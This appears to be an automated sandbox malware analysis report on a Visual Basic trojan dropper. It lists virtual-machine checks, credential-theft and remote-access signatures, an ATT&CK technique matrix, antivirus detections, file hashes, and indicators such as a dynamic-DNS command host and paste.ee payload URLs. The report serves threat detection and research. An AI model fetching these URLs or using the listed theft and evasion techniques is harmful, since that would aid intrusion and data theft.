          Source: GPgMeqI8Gy.exe, 00000000.00000002.2270244784.0000000000890000.00000004.00000020.00020000.00000000.sdmp, GPgMeqI8Gy.exe, 00000000.00000002.2270244784.00000000008F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
          Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
          Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.4.drBinary or memory string: vmci.sys
          Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
          Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
          Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
          Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.4.drBinary or memory string: VMware20,1
          Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
          Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
          Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
          Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
          Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
          Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
          Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
          Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
          Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
          Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
          Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
          Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
          Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
          Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
          Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 0.2.GPgMeqI8Gy.exe.8ada48.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.GPgMeqI8Gy.exe.8ada48.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.2270244784.0000000000890000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: GPgMeqI8Gy.exe PID: 5712, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 0.2.GPgMeqI8Gy.exe.8ada48.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.GPgMeqI8Gy.exe.8ada48.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.2270244784.0000000000890000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: GPgMeqI8Gy.exe PID: 5712, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
          DLL Side-Loading
          1
          Process Injection
          1
          Software Packing
          OS Credential Dumping11
          Security Software Discovery
          Remote Services1
          Archive Collected Data
          1
          Web Service
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading
          1
          Process Injection
          LSASS Memory1
          System Information Discovery
          Remote Desktop ProtocolData from Removable Media1
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
          Deobfuscate/Decode Files or Information
          Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          DLL Side-Loading
          NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture13
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Obfuscated Files or Information
          LSA SecretsInternet Connection DiscoverySSHKeylogging1
          Ingress Tool Transfer
          Scheduled TransferData Encrypted for Impact
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          GPgMeqI8Gy.exe34%VirustotalBrowse
          GPgMeqI8Gy.exe24%ReversingLabsWin32.Trojan.Generic
          GPgMeqI8Gy.exe100%AviraTR/Dropper.VB.Gen
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          fuckurfeelins.anondns.net11%VirustotalBrowse
          NameIPActiveMaliciousAntivirus DetectionReputation
          paste.ee
          104.21.84.67
          truefalse
            high
            NameMaliciousAntivirus DetectionReputation
            fuckurfeelins.anondns.nettrueunknown
            https://paste.ee/r/tC4AKfalse
              high
              NameSourceMaliciousAntivirus DetectionReputation
              https://www.google.comGPgMeqI8Gy.exe, 00000000.00000002.2270244784.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, GPgMeqI8Gy.exe, 00000000.00000002.2270244784.0000000000906000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://paste.ee/r/tC4AKyGPgMeqI8Gy.exe, 00000000.00000002.2270244784.0000000000890000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://paste.ee/r/tC4AKsGPgMeqI8Gy.exe, 00000000.00000002.2270244784.0000000000890000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://paste.ee/r/tC4AKZdGPgMeqI8Gy.exe, 00000000.00000002.2270244784.0000000000890000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://paste.ee/r/tC4AKpnsGPgMeqI8Gy.exe, 00000000.00000002.2270244784.0000000000890000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://www.google.com;GPgMeqI8Gy.exe, 00000000.00000002.2270244784.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, GPgMeqI8Gy.exe, 00000000.00000002.2270244784.0000000000906000.00000004.00000020.00020000.00000000.sdmpfalse
                          low
                          https://paste.ee/GPgMeqI8Gy.exe, 00000000.00000002.2270244784.00000000008D8000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://analytics.paste.ee;GPgMeqI8Gy.exe, 00000000.00000002.2270244784.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, GPgMeqI8Gy.exe, 00000000.00000002.2270244784.0000000000906000.00000004.00000020.00020000.00000000.sdmpfalse
                              low
                              https://analytics.paste.eeGPgMeqI8Gy.exe, 00000000.00000002.2270244784.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, GPgMeqI8Gy.exe, 00000000.00000002.2270244784.0000000000906000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://paste.ee/r/tC4AK)GPgMeqI8Gy.exe, 00000000.00000002.2270244784.0000000000890000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://upx.sf.netAmcache.hve.4.drfalse
                                    high
                                    https://cdnjs.cloudflare.comGPgMeqI8Gy.exe, 00000000.00000002.2270244784.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, GPgMeqI8Gy.exe, 00000000.00000002.2270244784.0000000000906000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://cdnjs.cloudflare.com;GPgMeqI8Gy.exe, 00000000.00000002.2270244784.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, GPgMeqI8Gy.exe, 00000000.00000002.2270244784.0000000000906000.00000004.00000020.00020000.00000000.sdmpfalse
                                        low
                                        https://secure.gravatar.comGPgMeqI8Gy.exe, 00000000.00000002.2270244784.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, GPgMeqI8Gy.exe, 00000000.00000002.2270244784.0000000000906000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://themes.googleusercontent.comGPgMeqI8Gy.exe, 00000000.00000002.2270244784.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, GPgMeqI8Gy.exe, 00000000.00000002.2270244784.0000000000906000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://paste.ee/r/tC4AK_GPgMeqI8Gy.exe, 00000000.00000002.2270244784.0000000000890000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              104.21.84.67
                                              paste.eeUnited States
                                              13335CLOUDFLARENETUSfalse
                                              Joe Sandbox version:40.0.0 Tourmaline
                                              Analysis ID:1429288
                                              Start date and time:2024-04-21 21:08:13 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 5m 15s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:9
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:GPgMeqI8Gy.exe
                                              renamed because original name is a hash value
                                              Original Sample Name:078bded0d7282b8b8daf4b40b837233a.exe
                                              Detection:MAL
                                              Classification:mal92.troj.evad.winEXE@2/6@1/1
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:Failed
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 20.42.73.29
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              TimeTypeDescription
                                              21:09:32API Interceptor1x Sleep call for process: WerFault.exe modified
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              104.21.84.67Chitanta bancara - #113243.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                              • paste.ee/d/u4bvR
                                              rdevuelto_Pagos.wsfGet hashmaliciousAgentTeslaBrowse
                                              • paste.ee/d/SDfNF
                                              Product list 0980DF098A7.xlsGet hashmaliciousUnknownBrowse
                                              • paste.ee/d/enGXm
                                              Payment_advice.vbsGet hashmaliciousUnknownBrowse
                                              • paste.ee/d/wXm0Y
                                              SHREE GANESH BOOK SERVICES-347274.xlsGet hashmaliciousUnknownBrowse
                                              • paste.ee/d/eA3FM
                                              dereac.vbeGet hashmaliciousUnknownBrowse
                                              • paste.ee/d/JZHbW
                                              P018400.xla.xlsxGet hashmaliciousUnknownBrowse
                                              • paste.ee/d/kmRFs
                                              comprobante0089.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                              • paste.ee/d/cJo7v
                                              RFQ l MR24000112.xla.xlsxGet hashmaliciousUnknownBrowse
                                              • paste.ee/d/EgkAG
                                              87645345.vbsGet hashmaliciousXWormBrowse
                                              • paste.ee/d/IJGyf
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              paste.eeSecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtfGet hashmaliciousRemcosBrowse
                                              • 172.67.187.200
                                              SecuriteInfo.com.Win32.SuspectCrc.28876.20318.xlsxGet hashmaliciousAgentTeslaBrowse
                                              • 172.67.187.200
                                              Invoice No. 03182024.docxGet hashmaliciousRemcosBrowse
                                              • 172.67.187.200
                                              eInvoicing_pdf.vbsGet hashmaliciousFormBookBrowse
                                              • 172.67.187.200
                                              F723838674.vbsGet hashmaliciousUnknownBrowse
                                              • 104.21.84.67
                                              Signed Proforma Invoice 3645479_pdf.vbsGet hashmaliciousFormBookBrowse
                                              • 172.67.187.200
                                              F723838674.vbsGet hashmaliciousRemcosBrowse
                                              • 104.21.84.67
                                              DHL Receipt_pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                              • 104.21.84.67
                                              Remittance slip.vbsGet hashmaliciousUnknownBrowse
                                              • 104.21.84.67
                                              SecuriteInfo.com.Exploit.ShellCode.69.31966.31539.rtfGet hashmaliciousRemcosBrowse
                                              • 104.21.84.67
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              CLOUDFLARENETUSSonic-Glyder.exeGet hashmaliciousStealitBrowse
                                              • 172.67.74.152
                                              SenPalia.exeGet hashmaliciousUnknownBrowse
                                              • 172.64.41.3
                                              UnderWars.exeGet hashmaliciousUnknownBrowse
                                              • 172.64.41.3
                                              Sonic-Glyder.exeGet hashmaliciousStealitBrowse
                                              • 104.26.12.205
                                              SenPalia.exeGet hashmaliciousUnknownBrowse
                                              • 172.64.41.3
                                              UnderWars.exeGet hashmaliciousUnknownBrowse
                                              • 104.21.7.115
                                              http://x-elon.fyiGet hashmaliciousGRQ ScamBrowse
                                              • 104.16.79.73
                                              2q45IEa3Ee.exeGet hashmaliciousLummaC, RisePro StealerBrowse
                                              • 104.26.5.15
                                              Y98pGn3FUt.elfGet hashmaliciousMiraiBrowse
                                              • 172.66.48.103
                                              WjikmGPcSC.exeGet hashmaliciousDCRatBrowse
                                              • 172.67.186.200
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousVidarBrowse
                                              • 104.21.84.67
                                              SecuriteInfo.com.Win64.MalwareX-gen.20388.25803.exeGet hashmaliciousUnknownBrowse
                                              • 104.21.84.67
                                              file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                              • 104.21.84.67
                                              file.exeGet hashmaliciousVidarBrowse
                                              • 104.21.84.67
                                              SecuriteInfo.com.Win32.CoinminerX-gen.23583.11262.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                              • 104.21.84.67
                                              file.exeGet hashmaliciousVidarBrowse
                                              • 104.21.84.67
                                              Essay on Resolution of Korean Forced Labor Claims.vbsGet hashmaliciousUnknownBrowse
                                              • 104.21.84.67
                                              SecuriteInfo.com.Win32.Malware-gen.6467.28521.exeGet hashmaliciousUnknownBrowse
                                              • 104.21.84.67
                                              SecuriteInfo.com.Win32.Malware-gen.6467.28521.exeGet hashmaliciousUnknownBrowse
                                              • 104.21.84.67
                                              z42MNA2024000000041-KWINTMADI-11310Y_K.exeGet hashmaliciousGuLoader, RemcosBrowse
                                              • 104.21.84.67
                                              No context
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):65536
                                              Entropy (8bit):1.0603559276668888
                                              Encrypted:false
                                              SSDEEP:192:VpqFkn40kigMqjEzextzuiFwZ24IO8wIg:+FkTkigvj5tzuiFwY4IO8wIg
                                              MD5:F5C30BC928CFD6CC04C72BEE94CACBFD
                                              SHA1:982783A6E0D3B8E6E16655FF8C31DCF9357FC4FE
                                              SHA-256:A5DBE55B067A07383A5FA4F15331182DDEF8CC12FFD79D92256FB04997A9883C
                                              SHA-512:DCFBE5CE0B5849F8DFEEE4FC635FB5D4D808EC026AF643B865CDE2B1BFDF2196584D4463F1A7112D6A1E020E6CB1BA2E94DBC7DB5717323C17BFB77E9B90AE55
                                              Malicious:false
                                              Reputation:low
                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.2.0.0.1.5.9.9.1.7.8.2.0.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.2.0.0.1.6.0.3.7.0.9.4.1.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.4.7.a.9.6.d.9.-.4.5.8.3.-.4.6.1.5.-.8.5.b.3.-.a.7.0.4.a.9.9.5.c.1.4.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.8.3.1.a.f.6.0.-.5.9.4.7.-.4.c.7.1.-.8.e.a.8.-.a.6.9.b.e.5.f.3.1.6.1.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.G.P.g.M.e.q.I.8.G.y...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.B.a.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.6.5.0.-.0.0.0.1.-.0.0.1.4.-.f.3.1.e.-.b.2.6.4.1.f.9.4.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.2.2.d.a.f.9.4.c.8.4.7.e.1.5.0.b.e.6.6.e.2.e.3.8.c.4.0.3.3.0.6.0.0.0.0.0.9.0.4.!.0.0.0.0.5.2.6.4.3.0.0.4.6.b.a.e.b.e.7.f.7.e.b.8.0.9.6.0.a.1.8.6.9.7.1.8.a.1.4.2.4.4.6.e.
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Mini DuMP crash report, 14 streams, Sun Apr 21 19:09:20 2024, 0x1205a4 type
                                              Category:dropped
                                              Size (bytes):127628
                                              Entropy (8bit):2.344888753488891
                                              Encrypted:false
                                              SSDEEP:768:0sMUaggDzYoTZ+OkyNb1M/dIVu07GdD49eA2ZgK:0bNDoOksb1MVIVu07Gp49eA2ZgK
                                              MD5:5B265E94F41B5A28237605F7AC1428E1
                                              SHA1:45EA400CC12E16EE598459D2DDBD0DD16A399326
                                              SHA-256:24B3574DE24675BC756F033FAA0311AED3EB2054C26D3783342DDE9D914B6B7B
                                              SHA-512:21EAB8146ECF40E308D4A3E0644308AC7A9102EC3220A3D5F821B414E9D14064A7CACD382419C4EF7C1D819DD465A35D1EAEE06854B8E71F7F13FC1113D7CDA1
                                              Malicious:false
                                              Reputation:low
                                              Preview:MDMP..a..... .......`d%f....................................D....M..........T.......8...........T............N...............$...........&..............................................................................eJ......L'......GenuineIntel............T.......P...Wd%f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):8404
                                              Entropy (8bit):3.7064874678844575
                                              Encrypted:false
                                              SSDEEP:192:R6l7wVeJuu6i6YEInSU9zXyMgmfnQ4bKpDT89bqPsfWum:R6lXJ36i6YEYSU9zXxgmfQYq0fG
                                              MD5:CA1479266407ECE856E799FD13A7F6CD
                                              SHA1:52EAC05BA9137017315B71414784BDDEF9EC400A
                                              SHA-256:D48D7FED2B05C2DD2551D749D2D85147AA25196929B991A8C69BDD1CCF5DD71E
                                              SHA-512:8C84642C24CED33DBE6FD97BB1590E08FD9F4AF7E99233F1B394D4D1DEA6E8686DCDF6C1B691E6655D670A7E44E93B8A4D3DF1ECA66C282A66A2C3ADE8D2C574
                                              Malicious:false
                                              Reputation:low
                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.7.1.2.<./.P.i.
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):4704
                                              Entropy (8bit):4.514538067434923
                                              Encrypted:false
                                              SSDEEP:48:cvIwWl8zsEJg77aI9m1rWpW8VYlYm8M4Jk/eelOqFe3+q8RIjqOZKx46RI6ymd:uIjfCI7EA7VBJk/eiA0I26s4626ymd
                                              MD5:E9DE7E43F48E3C2748E6B5055B518D82
                                              SHA1:5A9FEDA35833CCE4A4BA934B261C7201D5AD09B2
                                              SHA-256:C793EA53DCBE7158FBFB4705D0DAEA09A9DE1879F50C59738E98208F36F1A99C
                                              SHA-512:6E82FD3A9255972C40553F8901810E34BC71D90B4D6F2BA94D25A22A725EC8E3C21020767169D6C4FD0EC9145BB761DDA689DC06870970A1FFFADB3280792385
                                              Malicious:false
                                              Reputation:low
                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="290052" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                              Process:C:\Users\user\Desktop\GPgMeqI8Gy.exe
                                              File Type:Composite Document File V2 Document, Cannot read section info
                                              Category:dropped
                                              Size (bytes):589824
                                              Entropy (8bit):2.4309587446620924
                                              Encrypted:false
                                              SSDEEP:6144:t86wCpCfyFeIeSrMMSAtHX0M1YBRoJ/iRrefffI5:t8PCpCfyF1
                                              MD5:E0B8C91D2A1312F1A5F64C488F9F9D27
                                              SHA1:751AB6CB79AF075433414701B435A25C6BB0FE94
                                              SHA-256:1D2987A8B152EC69A9AB08BAF5AE48BFD4EF8218BAE2CB1CB921FFCD7AD733BB
                                              SHA-512:3343B7AC057DB9FB623EC1229B96DE67FA7003CF80D4438DCE0A4CC7075BBD7A87EA8EE7F3E6BFA09A94B06CDCA6EC445018DE028E192E21A809F08F073A6BCB
                                              Malicious:false
                                              Reputation:low
                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:MS Windows registry file, NT/2000 or above
                                              Category:dropped
                                              Size (bytes):1835008
                                              Entropy (8bit):4.421933717111865
                                              Encrypted:false
                                              SSDEEP:6144:xSvfpi6ceLP/9skLmb0OT5WSPHaJG8nAgeMZMMhA2fX4WABlEnNd0uhiTw:IvloT5W+EZMM6DFyH03w
                                              MD5:5BA773F1E11A365A67E9F9DB665462B2
                                              SHA1:90E9CB106E68BE7FF741ED7865A13942923025CC
                                              SHA-256:4BE6F1B631F8A1A2E5F5DD778C50F6E8D8F901EBFD5E784790DF5865385B3514
                                              SHA-512:04FFCE4C043D0A005C1D22B17098570A8AA8AC39F9BFCA8937E79458552E4C9F22548D9147DF4B19204B9FA2F5961FE6766954E7F8A6F27A1038C530169ECD37
                                              Malicious:false
                                              Reputation:low
                                              Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...i................................................................................................................................................................................................................................................................................................................................................SA.]........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):3.393345463837346
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.15%
                                              • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:GPgMeqI8Gy.exe
                                              File size:3'162'112 bytes
                                              MD5:078bded0d7282b8b8daf4b40b837233a
                                              SHA1:526430046baebe7f7eb80960a1869718a142446e
                                              SHA256:fd733056fe23c1d58de2178610834b5633dea41bd19f08063cff06a3732e9221
                                              SHA512:a564806cb5ddb7523b8a3960a7414ced9463b0b67f118d6dd451ef63c17d316ef84d1b09968321faa5b3597b80616df301181bb17bcbc4604909de10e2ca6f54
                                              SSDEEP:12288:lY8PCpCfyF1PeDEAX3jekDqEUO8IrO69ZKY2z+d68PCpCfyF1c:lo94EO3jekDpkz+Ei
                                              TLSH:E1E5B55320104C27E07AD7343F24C72CAFC43EADA6A978FD63C5BE66BB369818951E15
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........`...............................'......Rich....................PE..L....|.e..................&...................&...@........
                                              Icon Hash:1b676733391d2531
                                              Entrypoint:0x4016e8
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                              DLL Characteristics:
                                              Time Stamp:0x65BE7CDF [Sat Feb 3 17:50:23 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:b6bd2c758fd2124a56e081f0b8cb2b0c
                                              Instruction
                                              push 0061FB34h
                                              call 00007FBD855B9973h
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              xor byte ptr [eax], al
                                              add byte ptr [eax], al
                                              dec eax
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
